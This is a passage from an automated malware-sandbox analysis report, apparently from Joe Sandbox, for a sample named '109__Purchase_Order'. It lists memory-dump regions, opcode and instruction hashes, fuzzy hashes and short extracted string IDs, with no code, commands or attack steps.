                                                                                        • Opcode ID: ea93d80247d97ca6d42939b1be566d32d8669d68e041e931a86e9497f959499e
                                                                                        • Instruction ID: 35e76c24593326c44fa8c22e1d609c4332de66f965ca85fa20cb5c0723a67796
                                                                                        • Opcode Fuzzy Hash: ea93d80247d97ca6d42939b1be566d32d8669d68e041e931a86e9497f959499e
                                                                                        • Instruction Fuzzy Hash: 241113B6D003498FCB20DF9AC444ADEFBF4BB89318F10846AD569B7210D375A545CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 02FF243D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 6c2069c47771e5e4d0ef344c5ccf8dde241aab3fea4ba4483fef5d359f5c7663
                                                                                        • Instruction ID: f4282197c0d03ecaa515dd4c379ba5afa17a51a8d2e3882276841f19079ae41f
                                                                                        • Opcode Fuzzy Hash: 6c2069c47771e5e4d0ef344c5ccf8dde241aab3fea4ba4483fef5d359f5c7663
                                                                                        • Instruction Fuzzy Hash: B41103B58003489FCB10DF9AC585BDEBBF8EB48324F108459DA58A7210C375A984CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1687034001.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_150d000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e2ac60ce7ce078914573dd69aeb64595cd7bd5edc5bc1918a5c420f8993a6690
                                                                                        • Instruction ID: 779353659703679729aef92d6471734af191288d2db5ca2db999c4f3ad635138
                                                                                        • Opcode Fuzzy Hash: e2ac60ce7ce078914573dd69aeb64595cd7bd5edc5bc1918a5c420f8993a6690
                                                                                        • Instruction Fuzzy Hash: AC214871100200DFDB02DFC8C9C0B6ABFB5FB84324F20C569E9090F296C376E446C6A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1687227030.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_151d000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 21f581554570de0471ef01195e76dfd5a31c0a297c456b717d97a81dcdaa8ef3
                                                                                        • Instruction ID: 1bd78b09d19514bdd2843e8faf18d8df5f2af7d5b26cb8079fe6aa19348a6937
                                                                                        • Opcode Fuzzy Hash: 21f581554570de0471ef01195e76dfd5a31c0a297c456b717d97a81dcdaa8ef3
                                                                                        • Instruction Fuzzy Hash: 2C210075604200DFEB16DF58D988B2ABBB5FB84314F20C96DD80A4F25AD33AD846CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1687227030.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_151d000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 822f00769bec24d554850ac28a69ab65d997d6e6418a2b1116f267c136e86994
                                                                                        • Instruction ID: ba957e1f3ee2e0b2619052d3bc78724892f7dfb11fb109b3d0f622edb7b259e4
                                                                                        • Opcode Fuzzy Hash: 822f00769bec24d554850ac28a69ab65d997d6e6418a2b1116f267c136e86994
                                                                                        • Instruction Fuzzy Hash: 67219F755093808FDB03CF24D994B15BF71FB46214F28C5EAD8498F2A7C33A984ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1687034001.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_150d000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction ID: 3da0e26c2be68106e1f42d4e329715da3c2b89e88262f60e298d1f010beb1cba
                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction Fuzzy Hash: 0811DF72404240CFDB02CF84D5C4B5ABF71FB94324F24C2A9D9090F256C33AE45ACBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'kq$:$poq$~
                                                                                        • API String ID: 0-3551392484
                                                                                        • Opcode ID: 646ceb0d1ac21afb8394087db9575d9e4a73edc3ff9604cc38ab72cb4ef0fc02
                                                                                        • Instruction ID: a0455f6d40924db7fb3ebd6737ec8e037513c48622b165d5bc92cf8545fec819
                                                                                        • Opcode Fuzzy Hash: 646ceb0d1ac21afb8394087db9575d9e4a73edc3ff9604cc38ab72cb4ef0fc02
                                                                                        • Instruction Fuzzy Hash: AB32E275A04218DFDB15CFA9C944F99BBB2FF88304F1580E9E509AB262DB31AD91DF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bbf275e4dfd0977c5725a04e3e607b2fd9e5fe2dfce2f173e329b94ad9452da5
                                                                                        • Instruction ID: 645b862a575e32803d54f19c65b65ea57c82f1aa510836f22860241bbc7bf020
                                                                                        • Opcode Fuzzy Hash: bbf275e4dfd0977c5725a04e3e607b2fd9e5fe2dfce2f173e329b94ad9452da5
                                                                                        • Instruction Fuzzy Hash: 85E1FC75E042598FCB14CFA9C984AAEFBB2FF89304F248169D415AB356D734AD41CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1339dfa0cd560068bebb4fbfb52113ece6c4e8621cb56cc18d540ff9416c2462
                                                                                        • Instruction ID: bf1285baafaa966626a29143b487f3c620f557b1ecb0accc89e5f87bdc8f7206
                                                                                        • Opcode Fuzzy Hash: 1339dfa0cd560068bebb4fbfb52113ece6c4e8621cb56cc18d540ff9416c2462
                                                                                        • Instruction Fuzzy Hash: 46E1DA75E042198FCB14CFA9C980AAEFBB2FF89304F248169D419AB755D734AD41CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c7f59601a0168e2b04113fda0f564ba1fc29a475f7ab3c60c79cae6b9e1e27f4
                                                                                        • Instruction ID: 47f3e7de91d36545ccb8f5608a099d841b432a5df3f64ad4133dcc394d814a8c
                                                                                        • Opcode Fuzzy Hash: c7f59601a0168e2b04113fda0f564ba1fc29a475f7ab3c60c79cae6b9e1e27f4
                                                                                        • Instruction Fuzzy Hash: 66E1E875E042199FCB14CFA9C980AAEFBB2FF89304F248169D415AB355D734AD81CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 498fbcb5dce4ff420a964d01b756b8b8fd56dd4a33081fbc6eff20e59c634a3a
                                                                                        • Instruction ID: 80d54754f8512b8e905fe93bc2a81589f0d7045e86a2e060d6a0e86a30afcce5
                                                                                        • Opcode Fuzzy Hash: 498fbcb5dce4ff420a964d01b756b8b8fd56dd4a33081fbc6eff20e59c634a3a
                                                                                        • Instruction Fuzzy Hash: 7CE1D775E042198FDB14CFA9C980AAEFBB2FF89304F248169E415AB756D734AD41CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e8c86f63b52bb0585f7716757e513dfa7366a71287070320c8d156f7a6ffcc43
                                                                                        • Instruction ID: 2506abbb9954679353ca497431f9850032ffa991a310c707edc10732dcfa3e4f
                                                                                        • Opcode Fuzzy Hash: e8c86f63b52bb0585f7716757e513dfa7366a71287070320c8d156f7a6ffcc43
                                                                                        • Instruction Fuzzy Hash: 04E11975E142198FCB14DFA9C980AAEFBB2FF89304F248169D415AB356D734AD41CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 178d540b30a352037c6ce4507dc1ccd4e6e0124d4b0f2daa3c4e7a8692bca359
                                                                                        • Instruction ID: 20caff2ed383cf3e53f0d4f79142847e6bd6e2f76dde7733a0eae0315946e8b8
                                                                                        • Opcode Fuzzy Hash: 178d540b30a352037c6ce4507dc1ccd4e6e0124d4b0f2daa3c4e7a8692bca359
                                                                                        • Instruction Fuzzy Hash: F6D12A31C2075A8ECB01EB65D990699B771FF95300F10C79AE5493B261EF70AEC4CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 089a7bcd509206d50354ca812d250f59de0616b65de9846f15bf062e1a1a687c
                                                                                        • Instruction ID: c4aa2997549c84ee2a4fae188e63750df8da37037b5d68671a669b5a205ce722
                                                                                        • Opcode Fuzzy Hash: 089a7bcd509206d50354ca812d250f59de0616b65de9846f15bf062e1a1a687c
                                                                                        • Instruction Fuzzy Hash: C1A18F36E002098FCF05DFB4C9405AEBBB2FF85340B15456AEA06AB265DB75E955CF80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3fc31b6ddc1f36af2f075cf5dce6271536eddddb2508b32dd3ee07d80041c31b
                                                                                        • Instruction ID: c333a762211ec659d033e5c19fa9a0e1733a27ebdd91b5d4b5a3d80eec531979
                                                                                        • Opcode Fuzzy Hash: 3fc31b6ddc1f36af2f075cf5dce6271536eddddb2508b32dd3ee07d80041c31b
                                                                                        • Instruction Fuzzy Hash: 03D1F931C2075A8ECB01EBA5D990699B7B1FF95300F10D79AE5497B261EF70AEC4CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 39f1d0f5c235d63f329b21469e9c504a4b730b0e5a11202c16651ae397fb1ef2
                                                                                        • Instruction ID: fbed3691ba35c722ba91e91f9f7b98fdffe044f943b96f2f9f697c9a112a4045
                                                                                        • Opcode Fuzzy Hash: 39f1d0f5c235d63f329b21469e9c504a4b730b0e5a11202c16651ae397fb1ef2
                                                                                        • Instruction Fuzzy Hash: 0B513B74E142198FDB14CFAAC9805AEFBF2FF89304F24C1A9D418A7256D734A941CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c3ab895a5ad67886ec0852ce3a1455c9594599da46bdc05a26eb4935a0caf9bf
                                                                                        • Instruction ID: c3aa505473289756ba5c4c08da529d8d3fac7e4960ebcfcc69762ac0eaf6b807
                                                                                        • Opcode Fuzzy Hash: c3ab895a5ad67886ec0852ce3a1455c9594599da46bdc05a26eb4935a0caf9bf
                                                                                        • Instruction Fuzzy Hash: F24199B5E046188FEB18CF6BD9407CABBF3AFC9300F14C1AAD508AB265DB3459858F51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                        • API String ID: 0-1749821215
                                                                                        • Opcode ID: 35904a7c735c581789a15d1ddd80b761cecb749897a5ff66a6a987735e6be090
                                                                                        • Instruction ID: 65ef8a8901ed8be445ad9fc42054939e53b9b59d6c777f9964440fd88080f0bb
                                                                                        • Opcode Fuzzy Hash: 35904a7c735c581789a15d1ddd80b761cecb749897a5ff66a6a987735e6be090
                                                                                        • Instruction Fuzzy Hash: 50E1D775E00218CFDB14CFA9C984A9DBBB2FF48354F1580A9E919AB3A5DB30E941DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                        • API String ID: 0-1749821215
                                                                                        • Opcode ID: 046da84836dfa73207bd0b1c9af5f678b6430842ff28a304e33f482891cd871d
                                                                                        • Instruction ID: c188df0171c864ddfe458b6a56f6f3add4c4207989f36a6037dbc0d687a126b9
                                                                                        • Opcode Fuzzy Hash: 046da84836dfa73207bd0b1c9af5f678b6430842ff28a304e33f482891cd871d
                                                                                        • Instruction Fuzzy Hash: 6781E474E00208CFDB14DFAAD994A9DBBF2BF88340F14C16AE509AB365DB349881DF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                        • API String ID: 0-1749821215
                                                                                        • Opcode ID: 4b9d6f446ad51be35d30c5036dd36c91ea8d362abe58ec15a9c1eee75cf7d474
                                                                                        • Instruction ID: f446f2db38ac6ea834dbbdb41ba705eb4cb2d1024ce933d0cc55876475469b90
                                                                                        • Opcode Fuzzy Hash: 4b9d6f446ad51be35d30c5036dd36c91ea8d362abe58ec15a9c1eee75cf7d474
                                                                                        • Instruction Fuzzy Hash: BD81D774E01218CFDB14DFAAD984A9DBBF2BF88340F14C16AE909AB365DB349841DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                        • API String ID: 0-1749821215
                                                                                        • Opcode ID: 0c1743f1f76371b9e7a6e582cb023b3bbf008a45ecd2cb73e09ba7694b889419
                                                                                        • Instruction ID: a6c3bfa7094ef2d480d548f0e259ad3b55ea0abccb4a1e9876ae7a1cb3aa68ea
                                                                                        • Opcode Fuzzy Hash: 0c1743f1f76371b9e7a6e582cb023b3bbf008a45ecd2cb73e09ba7694b889419
                                                                                        • Instruction Fuzzy Hash: A181D774E00218CFDB14DFAAD984A9DBBF2BF88300F14D16AE909AB365DB349941DF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                        • API String ID: 0-1749821215
                                                                                        • Opcode ID: a01a62fa70a43a845c03c30870976c349d468f347e955267644d9fe97959e4a1
                                                                                        • Instruction ID: ab52ad9a8ecb729d61ce20fe374c89b875b26e2a8ea8461db522856c337da42d
                                                                                        • Opcode Fuzzy Hash: a01a62fa70a43a845c03c30870976c349d468f347e955267644d9fe97959e4a1
                                                                                        • Instruction Fuzzy Hash: 5581C574E00218CFDB14DFAAD984A9DBBF2BF88300F14D16AE509AB365DB349981DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                        • API String ID: 0-1749821215
                                                                                        • Opcode ID: 286134a4fd22879bdc3927e093625979a653be713104491ba20c8df636298d18
                                                                                        • Instruction ID: 7bec7fe6d9e6e3f1b624e2a8416a7192df8e77b642ea2881f4da9a80a07aa4ee
                                                                                        • Opcode Fuzzy Hash: 286134a4fd22879bdc3927e093625979a653be713104491ba20c8df636298d18
                                                                                        • Instruction Fuzzy Hash: 7781D474E00208CFDB14DFAAD984A9DBBF2BF89300F14D16AE509AB365DB349981DF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                        • API String ID: 0-1749821215
                                                                                        • Opcode ID: 892a6162c686b1ba29e279e4b56c3ecd9953e9960c6808bf36803c005c4fcf8d
                                                                                        • Instruction ID: ba172b5f28d9d6ef77e790b2979742189f8e2b5f990424e8b0c483ab9f892dbb
                                                                                        • Opcode Fuzzy Hash: 892a6162c686b1ba29e279e4b56c3ecd9953e9960c6808bf36803c005c4fcf8d
                                                                                        • Instruction Fuzzy Hash: 4781C174E01218CFDB54CFAAD984A9DBBF2BF88300F14C069E909AB365DB349981DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                        • API String ID: 0-1749821215
                                                                                        • Opcode ID: 150b6837d7b512ed1180a5a850111ed22ed781288753b2292fed621138f9355a
                                                                                        • Instruction ID: ab4fc64c2a4985081e0d9fa1f5cbf3065935292b1f0d67db4dc72f32851545c6
                                                                                        • Opcode Fuzzy Hash: 150b6837d7b512ed1180a5a850111ed22ed781288753b2292fed621138f9355a
                                                                                        • Instruction Fuzzy Hash: 39819174E00218CFDB14DFAAD984A9DFBF2BF88304F149069E509AB365DB349981DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (okq$(okq$,oq$,oq
                                                                                        • API String ID: 0-2865278577
                                                                                        • Opcode ID: 29d7c1374ba3c037f31de7d8503f62c292afcc7c5f8850e25360195672a11da9
                                                                                        • Instruction ID: 7c7a499dd732616cad0ff7e5ec3a4e7ac3237e963af0eeace34c26bc9f87a35c
                                                                                        • Opcode Fuzzy Hash: 29d7c1374ba3c037f31de7d8503f62c292afcc7c5f8850e25360195672a11da9
                                                                                        • Instruction Fuzzy Hash: 83D12971E00119DFCB18CFA9C9C4AADBBBAFF88385F158065E505EB2A1D730E861DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0oNp$PHkq$PHkq
                                                                                        • API String ID: 0-3540209698
                                                                                        • Opcode ID: e581383f26a105ba1bf8500e140a01efb1bcc785b31715420476032e1751a55f
                                                                                        • Instruction ID: c5da4562067dd3f0b86d0feb3937c72a05bf81ea91a807e7c9a279b5278fde4c
                                                                                        • Opcode Fuzzy Hash: e581383f26a105ba1bf8500e140a01efb1bcc785b31715420476032e1751a55f
                                                                                        • Instruction Fuzzy Hash: C761B475E002089FDB14DFAAD984A9EBBF2FF88304F24D069E505AB365DB349941DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (okq$4'kq
                                                                                        • API String ID: 0-1210385896
                                                                                        • Opcode ID: e192c4e801fa76cf813f885a5a036fcad17560068adfd7e3f5111d2c9843a187
                                                                                        • Instruction ID: f78c00e59546b020b411a5e1a78a77d6b83926e1807a647e3b74879b94d0e828
                                                                                        • Opcode Fuzzy Hash: e192c4e801fa76cf813f885a5a036fcad17560068adfd7e3f5111d2c9843a187
                                                                                        • Instruction Fuzzy Hash: 1E72AF71A00209DFCB15CFA8C984AAEBBF2FF88340F158569EA059B3A5D771ED41DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (okq$Hoq
                                                                                        • API String ID: 0-4134915641
                                                                                        • Opcode ID: 28dd1af816f317fe79d631ae2e5d0f4d167274d406e6e158c285910596198ec2
                                                                                        • Instruction ID: 98cc7e07b605b4d9bbc61d6fce9328505e174b984522cea9023b116772cf7ff8
                                                                                        • Opcode Fuzzy Hash: 28dd1af816f317fe79d631ae2e5d0f4d167274d406e6e158c285910596198ec2
                                                                                        • Instruction Fuzzy Hash: C1128B70A002198FCB14DF69C994AAEBBFABF88344F108169E605EB395DF34DD41DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Xoq$$kq
                                                                                        • API String ID: 0-227003152
                                                                                        • Opcode ID: 05dd8e8922756cc62f73b6a962931efeb80353813b8840c63eee59ff80cbb70c
                                                                                        • Instruction ID: e447279ab3fe3da7254c46358bcda0fe637e6b1f1ac4d7cdf9774af0a2754b4f
                                                                                        • Opcode Fuzzy Hash: 05dd8e8922756cc62f73b6a962931efeb80353813b8840c63eee59ff80cbb70c
                                                                                        • Instruction Fuzzy Hash: 38F15E75F00208CFCB18DFB9D9949AEBBB6BF88350B14846DE506A7398CE349842DB55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd
